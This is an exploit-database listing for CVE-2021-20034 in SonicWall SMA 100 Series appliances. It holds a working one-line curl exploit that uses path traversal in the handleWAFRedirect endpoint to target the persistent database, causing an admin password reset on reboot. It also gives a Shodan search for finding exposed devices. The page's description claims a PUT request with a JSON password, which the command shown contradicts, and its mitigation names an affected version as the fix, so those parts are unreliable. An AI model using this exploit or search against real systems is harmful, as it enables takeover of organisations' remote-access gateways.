header-logo
Suggest Exploit
vendor:
SMA 100 Series
by:
Jacob Baines
9.1
CVSS
CRITICAL
Password Reset
287
CWE
Product Name: SMA 100 Series
Affected Version From: 9.0.0.10-28sv
Affected Version To: 10.2.1.0-17sv
Patch Exists: YES
Related CWE: CVE-2021-20034
CPE: a:sonicwall:sonicwall_sma_100_series
Other Scripts:
Platforms Tested: SMA 500v using 9.0.0.10-28sv and 10.2.1.0-17sv
2021

SonicWall SMA 10.2.1.0-17sv – Password Reset

Overwrite the persistent database, resulting in password reset on reboot. The exploit is done by sending a PUT request to the vulnerable endpoint with a JSON payload containing the new password.

Mitigation:

Upgrade to the latest version of SonicWall SMA 10.2.1.0-17sv
Source

Exploit-DB raw data:

# Exploit Title: SonicWall SMA 10.2.1.0-17sv - Password Reset
# Description: Overwrite the persistent database, resulting in password reset on reboot.
# Shodan Dork: https://www.shodan.io/search?query=title%3A%22Virtual+Office%22+%22Server%3A+SonicWall%22
# Date: 10/19/2021
# Exploit Author: Jacob Baines (@Junior_Baines)
# Root Cause Analysis: https://attackerkb.com/topics/23t9VCbGzt/cve-2021-20034/rapid7-analysis?referrer=profile
# Vendor Homepage: https://www.sonicwall.com/
# Version: SMA 100 Series using 9.0.0.10-28sv, 10.2.0.7-34sv, and 10.2.1.0-17sv
# Tested on: SMA 500v using 9.0.0.10-28sv and 10.2.1.0-17sv
# CVE : CVE-2021-20034

curl -v --insecure "https://10.0.0.6/cgi-bin/handleWAFRedirect?hdl=../flash/etc/EasyAccess/var/conf/persist.db"